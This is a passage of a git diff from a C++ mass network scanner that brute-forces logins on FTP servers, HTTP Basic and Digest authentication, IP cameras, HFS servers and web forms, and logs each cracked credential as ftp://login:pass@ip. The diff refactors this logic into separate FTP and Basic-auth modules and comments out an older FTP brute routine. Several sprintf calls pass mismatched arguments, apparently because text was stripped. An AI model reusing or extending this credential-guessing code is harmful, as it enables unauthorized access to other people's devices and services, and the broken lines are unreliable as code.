SOCKET_ERROR) - { - int x = 1, xx = 0; - while(x != 0) - { - ZeroMemory(recvBuff, sizeof(recvBuff)); - x = recvWT(sockFTP, recvBuff, sizeof(recvBuff), gTimeOut + 5, &bTO); - xx += x; - if(xx < 1536) strncat(recvBuff2, recvBuff, x); - else break; - }; - - if(strstri(recvBuff2, "unknown command") != NULL || strstri(recvBuff2, "invalid command") != NULL) - { - stt->doEmitionYellowFoundData("[-] PASV failed. Router detected?"); - CSSOCKET(sockFTP); - strcpy(lps.login, loginLst[i]); - strcpy(lps.pass, passLst[j]); - strcpy(lps.other, "ROUTER"); - isActive = 0; - return lps; - }; - - char *ptr0 = strstr(recvBuff2, "227 "); - - if( ptr0 != NULL ) - { - if(strstr(ptr0, "(") != NULL) - { - char pasvData[32] = {0}; - char *ptr1 = strstr(ptr0, "("); - char *ptr2 = strstr(ptr0, ")"); - int sz = ptr2 - ptr1 - 1; - strncpy(pasvData, ptr1 + 1, sz); - char *ptr3 = strstr(pasvData, ","); - ptr3 = strstr(ptr3 + 1, ","); - ptr3 = strstr(ptr3 + 1, ","); - ptr3 = strstr(ptr3 + 1, ","); - - if(ptr3 != NULL) - { - char *ptrP2 = strstr(ptr3 + 1, ","); - char p1c[8] = {0}; - sz = ptrP2 - ptr3 - 1; - strncpy(p1c, ptr3 + 1, sz); - int p1 = atoi(p1c); - int p2 = atoi(ptrP2 + 1); - port = p1 * 256 + p2; - - sockAddr.sin_port = htons(port); - SOCKET newSockFTP = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP ); - connectionResult = connect(newSockFTP, (sockaddr*)&sockAddr, sizeof(sockAddr)); - - send(sockFTP, "LIST\r\n", 6, 0); - ZeroMemory(recvBuff, sizeof(recvBuff)); - int x = recvWT(newSockFTP, recvBuff, sizeof(recvBuff), gTimeOut + 3, &bTO); - if(x <= 0 || strstr(recvBuff, "unknown command") != NULL) - { - send(sockFTP, "MLSD\r\n", 6, 0); - ZeroMemory(recvBuff, sizeof(recvBuff)); - x = recvWT(newSockFTP, recvBuff, sizeof(recvBuff), gTimeOut + 3, &bTO); - if(x <= 0 || strstr(recvBuff, "unknown command") != NULL) - { - stt->doEmition_BAGreenData("[?] " + QString(pass) + " [MLSD&LIST failed or server closed connection.]"); +// send(sockFTP, "LIST\r\n", 6, 0); +// ZeroMemory(recvBuff, sizeof(recvBuff)); +// int x = recvWT(newSockFTP, recvBuff, sizeof(recvBuff), gTimeOut + 3, &bTO); +// if(x <= 0 || strstr(recvBuff, "unknown command") != NULL) +// { +// send(sockFTP, "MLSD\r\n", 6, 0); +// ZeroMemory(recvBuff, sizeof(recvBuff)); +// x = recvWT(newSockFTP, recvBuff, sizeof(recvBuff), gTimeOut + 3, &bTO); +// if(x <= 0 || strstr(recvBuff, "unknown command") != NULL) +// { +// stt->doEmition_BAGreenData("[?] " + QString(pass) + " [MLSD&LIST failed or server closed connection.]"); - CSSOCKET(sockFTP); - CSSOCKET(newSockFTP); - closedSocket = 1; - isActive = 0; - strcpy(lps.login, "UNKNOWN"); - return lps; - } - else { - stt->doEmition_BAGreenData("[+] " + QString(pass) + " [MLSD succeeded]"); - ps->directoryCount = _countFTPDirectories(recvBuff); - }; - } - else - { - stt->doEmition_BAGreenData("[+] " + QString(pass) + " [LIST succeeded]"); - ps->directoryCount = _countFTPDirectories(recvBuff); - }; +// CSSOCKET(sockFTP); +// CSSOCKET(newSockFTP); +// closedSocket = 1; +// strcpy(lps.login, "UNKNOWN"); +// return lps; +// } +// else { +// stt->doEmition_BAGreenData("[+] " + QString(pass) + " [MLSD succeeded]"); +// ps->directoryCount = _countFTPDirectories(recvBuff); +// }; +// } +// else +// { +// stt->doEmition_BAGreenData("[+] " + QString(pass) + " [LIST succeeded]"); +// ps->directoryCount = _countFTPDirectories(recvBuff); +// }; - CSSOCKET(newSockFTP); - } - else - { - stt->doEmitionYellowFoundData("[*] " + QString(ip) + " [PASV failed]"); - }; - } - else - { - stt->doEmitionYellowFoundData("[*] " + QString(ip) + " [PASV TO] Failed!"); - }; - } - else - { - stt->doEmitionYellowFoundData("[*] " + QString(ip) + " [PASV TO] Failed!"); - }; +// CSSOCKET(newSockFTP); +// } +// else +// { +// stt->doEmitionYellowFoundData("[*] " + QString(ip) + " [PASV failed]"); +// }; +// } +// else +// { +// stt->doEmitionYellowFoundData("[*] " + QString(ip) + " [PASV TO] Failed!"); +// }; +// } +// else +// { +// stt->doEmitionYellowFoundData("[*] " + QString(ip) + " [PASV TO] Failed!"); +// }; - if(xx > 1) - { - strcpy(ps->headr, "
 (");
-								strncat(ps->headr, recvBuff, 256);
-								strcat(ps->headr, ")
"); - }; +// if(xx > 1) +// { +// strcpy(ps->headr, "
 (");
+//								strncat(ps->headr, recvBuff, 256);
+//								strcat(ps->headr, ")
"); +// }; - strcpy(lps.login, loginLst[i]); - strcpy(lps.pass, passLst[j]); +// strcpy(lps.login, loginLst[i]); +// strcpy(lps.pass, passLst[j]); - CSSOCKET(sockFTP); - isActive = 0; - return lps; - } - else - { - stt->doEmitionRedFoundData("[FTP] Send error. " + QString(ip) + ":" + QString::number(port)); +// CSSOCKET(sockFTP); +// return lps; +// } +// else +// { +// stt->doEmitionRedFoundData("[FTP] Send error. " + QString(ip) + ":" + QString::number(port)); - strcpy(lps.login, loginLst[i]); - strcpy(lps.pass, passLst[j]); +// strcpy(lps.login, loginLst[i]); +// strcpy(lps.pass, passLst[j]); - CSSOCKET(sockFTP); - isActive = 0; - return lps; - }; - }; - }; +// CSSOCKET(sockFTP); +// return lps; +// }; +// }; +// }; - CSSOCKET(sockFTP); - closedSocket = 1; - ZeroMemory(recvBuff, sizeof(recvBuff)); - } - else - { - int WSAerr; - if(connectionResult == -1) WSAerr = WSAGetLastError(); - else WSAerr = WSAETIMEDOUT; +// CSSOCKET(sockFTP); +// closedSocket = 1; +// ZeroMemory(recvBuff, sizeof(recvBuff)); +// } +// else +// { +// int WSAerr; +// if(connectionResult == -1) WSAerr = WSAGetLastError(); +// else WSAerr = WSAETIMEDOUT; - if(gThreads > 1 - && WSAerr != WSAETIMEDOUT/*Timeout*/ - && WSAerr != WSAENOBUFS/*POOLOVERFLOW*/ - && WSAerr != WSAECONNREFUSED/*WSAECONNREFUSED*/ - && WSAerr != WSAECONNRESET/*WSAECONNRESET*/ - && WSAerr != 0) - { - stt->doEmitionRedFoundData("[FTPBrute] Cannot connect to " + QString(ip) + " " + QString(std::to_string(WSAerr).c_str())); - }; - CSSOCKET(sockFTP); - isActive = 0; - strcpy(lps.login, "UNKNOWN"); - return lps; - }; +// if(gThreads > 1 +// && WSAerr != WSAETIMEDOUT/*Timeout*/ +// && WSAerr != WSAENOBUFS/*POOLOVERFLOW*/ +// && WSAerr != WSAECONNREFUSED/*WSAECONNREFUSED*/ +// && WSAerr != WSAECONNRESET/*WSAECONNRESET*/ +// && WSAerr != 0) +// { +// stt->doEmitionRedFoundData("[FTPBrute] Cannot connect to " + QString(ip) + " " + QString(std::to_string(WSAerr).c_str())); +// }; +// CSSOCKET(sockFTP); +// strcpy(lps.login, "UNKNOWN"); +// return lps; +// }; - Sleep(100); +// Sleep(100); - if(breakPassLoop) - { - breakPassLoop = false; - break; - }; - }; - }; +// if(breakPassLoop) +// { +// breakPassLoop = false; +// break; +// }; +// }; +// }; - CSSOCKET(sockFTP); - isActive = 0; - strcpy(lps.login, "UNKNOWN"); - return lps; -} +// CSSOCKET(sockFTP); +// strcpy(lps.login, "UNKNOWN"); +// return lps; +//} -lopaStr _FTPLobby(char *ip, int port, PathStr *ps) -{ - while(BrutingThrds >= gMaxBrutingThreads) Sleep(700); +//lopaStr _FTPLobby(char *ip, int port, PathStr *ps) +//{ +// while(BrutingThrds >= gMaxBrutingThreads) Sleep(700); - lopaStr lps; - ZeroMemory(lps.login, sizeof(lps.login)); - ZeroMemory(lps.pass, sizeof(lps.pass)); - ZeroMemory(lps.other, sizeof(lps.other)); +// lopaStr lps; +// ZeroMemory(lps.login, sizeof(lps.login)); +// ZeroMemory(lps.pass, sizeof(lps.pass)); +// ZeroMemory(lps.other, sizeof(lps.other)); - BruteUtils::BConInc(); - lps = _FTPBrute(ip, port, ps); - BruteUtils::BConDec(); +// BruteUtils::BConInc(); +// lps = _FTPBrute(ip, port, ps); +// BruteUtils::BConDec(); - return lps; -} +// return lps; +//} int _webLoginSeq(char *request, char *login, char *pass, char *ip, int port, int passCounter, char *type, std::vector negVector) { @@ -1414,8 +1396,7 @@ lopaStr _IPCameraBrute(char *ip, int port, char *SPEC) ZeroMemory(lps.other, sizeof(lps.other)); char login[128] = {0}; char pass[128] = {0}; - char request[1024] = {0}; - isActive = 1; + char request[1024] = {0}; int passCounter = 1; std::vector negVector; @@ -1470,7 +1451,7 @@ lopaStr _IPCameraBrute(char *ip, int port, char *SPEC) else { stt->doEmitionRedFoundData("[_IPCameraBrute] No \"SPEC\" specified!"); - isActive = 0; + strcpy(lps.login, "UNKNOWN"); return lps; }; @@ -1688,22 +1669,20 @@ lopaStr _IPCameraBrute(char *ip, int port, char *SPEC) int res = _webLoginSeq(request, login, pass, ip, port, passCounter, SPEC, negVector); if(res == 1) - { - isActive = 0; + { strcpy(lps.login, loginLst[i]); strcpy(lps.pass, passLst[j]); return lps; } else if(res == -1) - { - isActive = 0; + { strcpy(lps.login, "UNKNOWN"); return lps; }; ++passCounter; }; - }; - isActive = 0; + }; + strcpy(lps.login, "UNKNOWN"); return lps; } diff --git a/externData.h b/externData.h index a696a3f..160f8b0 100644 --- a/externData.h +++ b/externData.h @@ -27,7 +27,7 @@ extern bool trackerOK, __savingBackUpFile, globalScanFlag, MapWidgetOpened, BALogSwitched; extern int found, indexIP, gMode, MaxPass, MaxLogin, MaxWFLogin, MaxWFPass, MaxSSHPass, - GlobalNegativeSize, isActive, gMaxBrutingThreads, + GlobalNegativeSize, gMaxBrutingThreads, gTimeOut, PieAnomC1, PieSusp, PieBA, PieLowl, PieWF, PieSSH, gThreadDelay, AnomC1, Filt, Overl, Lowl, Alive, saved, Susp, diff --git a/finder.cpp b/finder.cpp index 0019508..ff86826 100644 --- a/finder.cpp +++ b/finder.cpp @@ -4,6 +4,8 @@ #include "externData.h" #include "WebformWorker.h" #include "Connector.h" +#include "BasicAuth.h" +#include "FTPAuth.h" #include char* strstri(const char *_Str, const char *_SubStr) @@ -404,7 +406,8 @@ int ContentFilter(const char *buff, int port, char *ip, char *cp) else return -1; } -void fillGlobalLogData(char *ip, char *hostname, char *port, const char *sz, char *title, char *login, char *pass, char *comment, char *cdpg, char *clss) +void fillGlobalLogData(char *ip, char *hostname, char *port, const char *sz, char *title, + const char *login, const char *pass, char *comment, char *cdpg, char *clss) { if(trackerOK == true) { @@ -648,7 +651,6 @@ void fputsf(char *text, int flag, char *msg) fputs (topBuff, file); }; - int innerCounter = 0; while(fOpened) { @@ -658,7 +660,7 @@ void fputsf(char *text, int flag, char *msg) break; }; ++innerCounter; - Sleep((rand() % 300 + 60)); + Sleep((rand() % 100 + 60)); }; fOpened = true; fputs (string, file); @@ -793,35 +795,19 @@ void putInFile(int flag, char *ip, char *port, int recd, char *finalstr, char *h ZeroMemory(msg, strlen(msg)); } -void _specFillerBA(char *hl, char *ip, char *port, char *finalstr, char *login, char *pass, int flag) +void _specFillerBA(char *hl, char *ip, char *port, char *finalstr, const char *login, const char *pass, int flag) { - char log[512] = {0}; + char log[512] = {0}; ++PieBA; - - strcpy(log, "[BA]:"); - strcat(log, ""); - if(strcmp(login, "NULL") != 0 && strcmp(pass, "NULL") != 0) { - strcat(log, login); - strcat(log, ":"); - strcat(log, pass); - strcat(log, "@"); - } - strcat(log, ip); - strcat(log, port); - strcat(log, " T: "); - strcat(log, finalstr); - strcat(log, ""); - strcat(log, "\n"); + if(strcmp(login, "NULL") != 0 && strcmp(pass, "NULL") != 0) + { + sprintf(log, "[BA]:%s:%s@%s%s T: %s\n", + login, pass, ip, port, login, pass, ip, port, finalstr); + } else { + sprintf(log, "[BA]:%s%s T: %s\n", + ip, port, ip, port, finalstr); + } stt->doEmitionFoundData(QString::fromLocal8Bit(log)); @@ -1039,10 +1025,8 @@ void _getInputVal(std::vector inputVec, char *buff, char *key) }; } -void _specWFBrute(char *ip, int port, char *hl, char *buff, int flag, char *path, char *comment, char *tclass, char *cp, int recd, char *title) +void _specWFBrute(char *ip, int port, char *hl, const char *buff, int flag, char *path, char *comment, char *tclass, char *cp, int recd, char *title) { - char cookie[1024] = {0}; - if(strstr(buff, "VER_CODE") != NULL || strstri(buff, "captcha") != NULL) { if(gNegDebugMode) @@ -1050,8 +1034,7 @@ void _specWFBrute(char *ip, int port, char *hl, char *buff, int flag, char *path stt->doEmitionDebugFoundData("[" + QString(ip) + ":" + QString::number(port) + "" + "] Ignoring: Captcha detected."); }; return; - }; - isActive = 1; + }; char methodVal[128] = {0}; char actionVal[512] = {0}; @@ -1208,8 +1191,7 @@ void _specWFBrute(char *ip, int port, char *hl, char *buff, int flag, char *path ///fillGlobalLogData(ip, hl, tport, std::to_string(recd).c_str(), title, "", "", "UnknownWebform", cp, tclass); ///putInFile(flag, ip, tport, recd, title, hl, cp); }; - }; - isActive = 0; + }; } void _specWEBIPCAMBrute(char *ip, int port, char *hl, char *finalstr, int flag, char *comment, char *cp, int recd, char *SPEC) @@ -1231,19 +1213,18 @@ void _specWEBIPCAMBrute(char *ip, int port, char *hl, char *finalstr, int flag, }; } -void _specBrute(char *cookie, char *ip, int port, char *hl, char *finalstr, int flag, char *path, char *comment, char *cp, int recd) +void _specBrute(char *cookie, char *ip, int port, + char *hl, char *finalstr, int flag, + char *path, char *comment, char *cp, int recd) { - isActive = 1; - lopaStr lps; - ZeroMemory(lps.login, sizeof(lps.login)); - ZeroMemory(lps.pass, sizeof(lps.pass)); - ZeroMemory(lps.other, sizeof(lps.other)); char temp[64] = {0}; char tport[32] = {0}; sprintf(tport, ":%d", port); - if(strcmp(comment, "[DIGEST]") == 0) lps = _BALobby(cookie, ip, port, path, "[DIGEST]"); - else lps = _BALobby(cookie, ip, port, path, "[NORMAL]"); + const lopaStr &lps = BA::_BALobby((string(ip) + string(path)).c_str(), port); + + //if(strcmp(comment, "[DIGEST]") == 0) lps = _BALobby(cookie, ip, port, path, "[DIGEST]"); + //else lps = _BALobby(cookie, ip, port, path, "[NORMAL]"); if(strstr(lps.login, "UNKNOWN") == NULL && strlen(lps.other) == 0) { @@ -1435,11 +1416,6 @@ int Lexems::_filler(int p, const char* buffcpy, char* ip, int recd, Lexems *lx, return -1; }; - lopaStr lps; - ZeroMemory(lps.login, sizeof(lps.login)); - ZeroMemory(lps.pass, sizeof(lps.pass)); - ZeroMemory(lps.other, sizeof(lps.other)); - PathStr ps; ps.port = p; strcpy(ps.ip, ip); @@ -1458,15 +1434,13 @@ int Lexems::_filler(int p, const char* buffcpy, char* ip, int recd, Lexems *lx, strcpy(ps.headr, GetTitle(buffcpy)); ps.flag = flag; - char pps[256] = {0}; - strcpy(pps, "/"); + char baPath[256] = {0}; + strcpy(baPath, "/"); - std::vector redirStrLst; - char rBuff[65536] = {0}; - strncpy(rBuff, buffcpy, 65535); + std::vector redirStrLst; if(flag == 0 || flag == 3 || flag == 7 ) { - int rh = _header(ip, p, buffcpy, lx, &ps, &redirStrLst, rBuff); + int rh = _header(ip, p, buffcpy, lx, &ps, &redirStrLst); strcpy(cp, ps.codepage); if (rh == -1) return -1; if(rh <= -2) @@ -1478,7 +1452,7 @@ int Lexems::_filler(int p, const char* buffcpy, char* ip, int recd, Lexems *lx, }; int sz = strlen(ps.path); - strncpy(pps, ps.path, (sz < 256 ? sz : 256)); + strncpy(baPath, ps.path, (sz < 256 ? sz : 256)); } else { @@ -1492,21 +1466,10 @@ int Lexems::_filler(int p, const char* buffcpy, char* ip, int recd, Lexems *lx, if(flag == 16) { - isActive = 1; - char log[2048] = {0}; char logEmit[2048] = {0}; -// strcpy(logEmit, "[FTP]:"); -// strcpy(log, "[FTP]:"); -// strcat(log, ip); -// strcat(log, ":"); -// strcat(log, port); -// strcat(log, ""); -// strcat(log, "; Received: "); -// strncat(log, std::to_string(recd).c_str(), 100); - - lps = _FTPLobby(ip, p, &ps); + const lopaStr &lps = FTPA::_FTPLobby(ip, p, &ps); if(strstr(lps.other, "ROUTER") != NULL) { @@ -1517,47 +1480,11 @@ int Lexems::_filler(int p, const char* buffcpy, char* ip, int recd, Lexems *lx, sprintf(logEmit, "[FTP]:ftp://%s:%s@%s [ROUTER]", lps.login, lps.pass, ip, lps.login, lps.pass, ip, ip); -// strcat(log, "ftp://"); -// strcat(log, lps.login); -// strcat(log, ":"); -// strcat(log, lps.pass); -// strcat(log, "@"); -// strcat(log, ip); -// strcat(log, " [ROUTER]"); -// strcat(log, ps.headr); - -// strcat(logEmit, "ftp://"); -// strcat(logEmit, lps.login); -// strcat(logEmit, ":"); -// strcat(logEmit, lps.pass); -// strcat(logEmit, "@"); -// strcat(logEmit, ip); -// strcat(logEmit, " [ROUTER]"); - fputsf (log, flag, "FTP"); fillGlobalLogData(ip, hl, port, std::to_string(recd).c_str(), "[FTP service]", lps.login, lps.pass, "Router FTP detected.", cp, "FTP"); - - - + stt->doEmitionFoundData(QString::fromLocal8Bit(logEmit)); - } else if(strstr(lps.login, "UNKNOWN") == NULL && strlen(lps.other) == 0) { @@ -1568,37 +1495,6 @@ int Lexems::_filler(int p, const char* buffcpy, char* ip, int recd, Lexems *lx, sprintf(logEmit, "[FTP]:ftp://%s:%s@%s (F:%d)", lps.login, lps.pass, ip, lps.login, lps.pass, ip, ps.directoryCount); -// strcat(log, "ftp://"); -// strcat(log, lps.login); -// strcat(log, ":"); -// strcat(log, lps.pass); -// strcat(log, "@"); -// strcat(log, ip); -// strcat(log, ""); -// strcat(log, ps.headr); - -// strcat(logEmit, "ftp://"); -// strcat(logEmit, lps.login); -// strcat(logEmit, ":"); -// strcat(logEmit, lps.pass); -// strcat(logEmit, "@"); -// strcat(logEmit, ip); -// strcat(logEmit, " (F:"); -// strcat(logEmit, std::to_string(ps.directoryCount).c_str()); -// strcat(logEmit, ")"); - fputsf(log, flag, "FTP"); fillGlobalLogData(ip, hl, port, std::to_string(recd).c_str(), "[FTP service]", lps.login, lps.pass, "NULL", cp, "FTP"); @@ -1769,60 +1665,39 @@ int Lexems::_filler(int p, const char* buffcpy, char* ip, int recd, Lexems *lx, _specBrute(ps.cookie, ip, p, hl, "IP Camera", flag, "/rdr.cgi", "Basic Authorization", cp, recd); } else if(flag == 15) //For HFS - { - char temp[64] = {0}; + { char log[512] = {0}; - isActive = 1; ++AnomC1; - lps = _BALobby(ps.cookie, ip, p, "/~login", "[NORMAL]"); + const lopaStr &lps = BA::_BALobby((string(ip) + "/~login").c_str(), p); sprintf(log, "[HFS]:%s :: %s:%s T: %s Pass: %s:%s", hl, ip, port, ip, port, finalstr, lps.login, lps.pass); - -// strcpy(log, "[HFS]:"); -// strcat(log, hl); -// strcat(log, " :: "); -// strcat(log, ip); -// strcat(log, ":"); -// strcat(log, port); -// strcat(log, " T: "); -// strcat(log, finalstr); -// strcat(log, " Pass: "); -// strcat(log, lps.login); -// strcat(log, ":"); -// strcat(log, lps.pass); -// strcat(log, ""); + fillGlobalLogData(ip, hl, port, std::to_string(recd).c_str(), finalstr, lps.login, lps.pass, "HFS-FTP", cp, "Basic Authorization"); fputsf (log , flag, "HFS"); - stt->doEmitionFoundData(QString::fromLocal8Bit(log)); - ZeroMemory(temp, sizeof(temp)); + stt->doEmitionFoundData(QString::fromLocal8Bit(log)); } else if(flag == 1) { - _specBrute(ps.cookie, ip, p, hl, finalstr, flag, pps, "[NORMAL]", cp, recd); + _specBrute(ps.cookie, ip, p, hl, finalstr, flag, baPath, "[NORMAL]", cp, recd); } else if(flag == 101) { - _specBrute(ps.cookie, ip, p, hl, finalstr, flag, pps, "[DIGEST]", cp, recd); + _specBrute(ps.cookie, ip, p, hl, finalstr, flag, baPath, "[DIGEST]", cp, recd); } else if(flag == 10) { - _specWFBrute(ip, p, hl, rBuff, flag, pps, "Web Form", "Web Form", cp, recd, finalstr); + _specWFBrute(ip, p, hl, buffcpy, flag, baPath, "Web Form", "Web Form", cp, recd, finalstr); } else { putInFile(flag, ip, port, recd, finalstr, hl, cp); }; - return flag; } -int redirectReconnect(char *cookie, char *ip, int port, char *str, Lexems *ls, PathStr *ps, std::vector *redirStrLst, char *buff) +int redirectReconnect(char *cookie, char *ip, int port, char *str, Lexems *ls, PathStr *ps, std::vector *redirStrLst) { if(ls->iterationCount++ == 5) { @@ -1893,12 +1768,12 @@ int redirectReconnect(char *cookie, char *ip, int port, char *str, Lexems *ls, P sprintf(nip.get(), "%s%s", tempIP, tempPath); std::string buffer; int cSz = Connector::nConnect(nip.get(), tempPort, &buffer); - if(cSz > -1) - { - strncpy(buff, buffer.c_str(), (cSz < 65535 ? cSz : 65535)); - strcpy(ps->codepage, GetCodePage(buff)); - ls->flag = ContentFilter(buff, tempPort, tempIP, ps->codepage); + if(cSz > -1) + { + strcpy(ps->codepage, GetCodePage(buffer.c_str())); + + ls->flag = ContentFilter(buffer.c_str(), tempPort, tempIP, ps->codepage); ps->flag = ls->flag; if(ls->flag == -1) @@ -1908,10 +1783,11 @@ int redirectReconnect(char *cookie, char *ip, int port, char *str, Lexems *ls, P return -1; }; + if(ls->flag >= 17 || ls->flag == 11 || ls->flag == 12 || ls->flag == 13 || ls->flag == 14 || ls->flag == 1 || ls->flag == 10) { - strcat(ps->headr, GetTitle(buff)); + strcat(ps->headr, GetTitle(buffer.c_str())); ps->flag = ls->flag; strcpy(ps->path, tempPath); ps->port = tempPort; @@ -1919,6 +1795,7 @@ int redirectReconnect(char *cookie, char *ip, int port, char *str, Lexems *ls, P return -2; }; + if(ls->flag == 6) { ps->flag = ls->flag; @@ -1927,8 +1804,9 @@ int redirectReconnect(char *cookie, char *ip, int port, char *str, Lexems *ls, P }; strcat(ps->headr, " -> "); - strcat(ps->headr, GetTitle(buff)); - if (ls->_header(tempIP, tempPort, buff, ls, ps, redirStrLst, buff) == -1) + strcat(ps->headr, GetTitle(buffer.c_str())); + + if (ls->_header(tempIP, tempPort, buffer.c_str(), ls, ps, redirStrLst) == -1) { ps->flag = -1; strcpy(ps->path, tempPath); @@ -1936,17 +1814,7 @@ int redirectReconnect(char *cookie, char *ip, int port, char *str, Lexems *ls, P return -1; }; - ps->port = tempPort; -// if(strlen(buff) < 1) -// { -// ps->flag = 3; -// ls->flag = 3; -// } -// else if(cstr.overflow == true) -// { -// ls->flag = 0; -// ps->flag = 0; -// }; + ps->port = tempPort; } else { @@ -1962,14 +1830,17 @@ int redirectReconnect(char *cookie, char *ip, int port, char *str, Lexems *ls, P tempPort = 80; char *ptr1 = strstri(str, "http://"); char *ptr2 = _findFirst(str + 7, ":/?"); + if(ptr2 != NULL) { int sz = ptr2 - ptr1 - 7; ZeroMemory(tempIP, MAX_ADDR_LEN); strncpy(tempIP, ptr1 + 7, sz < 128 ? sz : 128); + if(ptr2[0] == ':') { char *ptrPath = strstr(ptr2, "/"); + if(ptrPath != NULL) { sz = ptrPath - ptr2 - 1; @@ -2012,12 +1883,12 @@ int redirectReconnect(char *cookie, char *ip, int port, char *str, Lexems *ls, P sprintf(nip.get(), "%s%s", tempIP, tempPath); std::string buffer; int cSz = Connector::nConnect(nip.get(), tempPort, &buffer); - if(cSz > -1) - { - strncpy(buff, buffer.c_str(), (cSz < 65535 ? cSz : 65535)); - strcpy(ps->codepage, GetCodePage(buff)); - ls->flag = ContentFilter(buff, tempPort, tempIP, ps->codepage); + if(cSz > -1) + { + strcpy(ps->codepage, GetCodePage(buffer.c_str())); + + ls->flag = ContentFilter(buffer.c_str(), tempPort, tempIP, ps->codepage); ps->flag = ls->flag; if(ls->flag == -1) @@ -2027,10 +1898,11 @@ int redirectReconnect(char *cookie, char *ip, int port, char *str, Lexems *ls, P return -1; }; + if(ls->flag >= 17 || ls->flag == 11 || ls->flag == 12 || ls->flag == 13 || ls->flag == 14 || ls->flag == 1 || ls->flag == 10) { - strcat(ps->headr, GetTitle(buff)); + strcat(ps->headr, GetTitle(buffer.c_str())); ps->flag = ls->flag; strcpy(ps->path, tempPath); ps->port = tempPort; @@ -2038,6 +1910,7 @@ int redirectReconnect(char *cookie, char *ip, int port, char *str, Lexems *ls, P return -2; }; + if(ls->flag == 6) { ps->flag = ls->flag; @@ -2046,9 +1919,9 @@ int redirectReconnect(char *cookie, char *ip, int port, char *str, Lexems *ls, P }; strcat(ps->headr, " -> "); - strcat(ps->headr, GetTitle(buff)); + strcat(ps->headr, GetTitle(buffer.c_str())); - if (ls->_header(tempIP, tempPort, buff, ls, ps, redirStrLst, buff) == -1) + if (ls->_header(tempIP, tempPort, buffer.c_str(), ls, ps, redirStrLst) == -1) { ps->flag = -1; strcpy(ps->path, tempPath); @@ -2056,17 +1929,6 @@ int redirectReconnect(char *cookie, char *ip, int port, char *str, Lexems *ls, P return -1; }; ps->port = tempPort; - -// if(strlen(buff) < 1) -// { -// ps->flag = 3; -// ls->flag = 3; -// } -// else if(cstr.overflow == true) -// { -// ls->flag = 0; -// ps->flag = 0; -// }; } else { @@ -2087,12 +1949,12 @@ int redirectReconnect(char *cookie, char *ip, int port, char *str, Lexems *ls, P sprintf(nip.get(), "%s%s", tempIP, tempPath); std::string buffer; int cSz = Connector::nConnect(nip.get(), tempPort, &buffer); - if(cSz > -1) - { - strncpy(buff, buffer.c_str(), (cSz < 65535 ? cSz : 65535)); - strcpy(ps->codepage, GetCodePage(buff)); - ls->flag = ContentFilter(buff, port, ip, ps->codepage); + if(cSz > -1) + { + strcpy(ps->codepage, GetCodePage(buffer.c_str())); + + ls->flag = ContentFilter(buffer.c_str(), port, ip, ps->codepage); ps->flag = ls->flag; if(ls->flag == -1) @@ -2106,7 +1968,7 @@ int redirectReconnect(char *cookie, char *ip, int port, char *str, Lexems *ls, P if(ls->flag >= 17 || ls->flag == 11 || ls->flag == 12 || ls->flag == 13 || ls->flag == 14 || ls->flag == 1 || ls->flag == 10) { - strcat(ps->headr, GetTitle(buff)); + strcat(ps->headr, GetTitle(buffer.c_str())); ps->flag = ls->flag; strcpy(ps->path, tempPath); ps->port = port; @@ -2122,9 +1984,9 @@ int redirectReconnect(char *cookie, char *ip, int port, char *str, Lexems *ls, P }; strcat(ps->headr, "->"); - strcat(ps->headr, GetTitle(buff)); + strcat(ps->headr, GetTitle(buffer.c_str())); - if (ls->_header(tempIP, tempPort, buff, ls, ps, redirStrLst, buff) == -1) + if (ls->_header(tempIP, tempPort, buffer.c_str(), ls, ps, redirStrLst) == -1) { ps->flag = -1; strcpy(ps->path, tempPath); @@ -2132,17 +1994,6 @@ int redirectReconnect(char *cookie, char *ip, int port, char *str, Lexems *ls, P return -1; }; ps->port = tempPort; -// if(strlen(buff) < 1) -// { -// ps->flag = 3; -// ls->flag = 3; -// } -// else if(cstr.overflow == true) -// { -// ls->flag = 0; -// ps->flag = 0; -// }; - } else { @@ -2158,13 +2009,14 @@ int redirectReconnect(char *cookie, char *ip, int port, char *str, Lexems *ls, P sprintf(nip.get(), "%s%s", ip, str); std::string buffer; int cSz = Connector::nConnect(nip.get(), port, &buffer); - if(cSz > -1) - { - strncpy(buff, buffer.c_str(), (cSz < 65535 ? cSz : 65535)); - strcpy(ps->codepage, GetCodePage(buff)); - ls->flag = ContentFilter(buff, port, ip, ps->codepage); + if(cSz > -1) + { + strcpy(ps->codepage, GetCodePage(buffer.c_str())); + + ls->flag = ContentFilter(buffer.c_str(), port, ip, ps->codepage); ps->flag = ls->flag; + if(ls->flag == -1) { ps->flag = -1; @@ -2176,7 +2028,7 @@ int redirectReconnect(char *cookie, char *ip, int port, char *str, Lexems *ls, P if(ls->flag >= 17 || ls->flag == 11 || ls->flag == 12 || ls->flag == 13 || ls->flag == 14 || ls->flag == 1 || ls->flag == 10) { - strcat(ps->headr, GetTitle(buff)); + strcat(ps->headr, GetTitle(buffer.c_str())); ps->flag = ls->flag; strcpy(ps->path, tempPath); ps->port = port; @@ -2193,20 +2045,9 @@ int redirectReconnect(char *cookie, char *ip, int port, char *str, Lexems *ls, P }; strcat(ps->headr, " -> "); - strcat(ps->headr, GetTitle(buff)); - ls->_header(ip, port, buff, ls, ps, redirStrLst, buff); + strcat(ps->headr, GetTitle(buffer.c_str())); + ls->_header(ip, port, buffer.c_str(), ls, ps, redirStrLst); ps->port = tempPort; - -// if(strlen(buff) < 1) -// { -// ps->flag = 3; -// ls->flag = 3; -// } -// else if(cstr.overflow == true) -// { -// ls->flag = 0; -// ps->flag = 0; -// }; } else { @@ -2284,7 +2125,7 @@ void _getLinkFromJSLocation(char *dataBuff, char *str, char *tag, char *ip, int sz = ptrQuoteTemp - ptrQuote1 + 1; } char *tempBuff = new char[sz + 1]; - ZeroMemory(tempBuff, sizeof(tempBuff)); + ZeroMemory(tempBuff, sizeof(*tempBuff)); strncpy(tempBuff, ptrQuote1 + 1, sz); memset(tempBuff + sz, 0, 1); char delim[2] = {0}; @@ -2365,7 +2206,7 @@ void _getJSCookie(char *dataBuff, const char *str, char *ip, int port) }; } -int Lexems::_header(char *ip, int port, const char str[], Lexems *l, PathStr *ps, std::vector *redirStrLst, char *rBuff) +int Lexems::_header(char *ip, int port, const char str[], Lexems *l, PathStr *ps, std::vector *redirStrLst) { std::string redirectStr = ""; if(strstr(str, "Set-Cookie:") != NULL) strncpy(ps->cookie, _getAttribute(str, "Set-Cookie:"), COOKIE_MAX_SIZE); @@ -2455,7 +2296,7 @@ int Lexems::_header(char *ip, int port, const char str[], Lexems *l, PathStr *ps if(std::find(redirStrLst->begin(), redirStrLst->end(), redirectStr) == redirStrLst->end()) { redirStrLst->push_back(redirectStr); - redirectReconnect(ps->cookie, 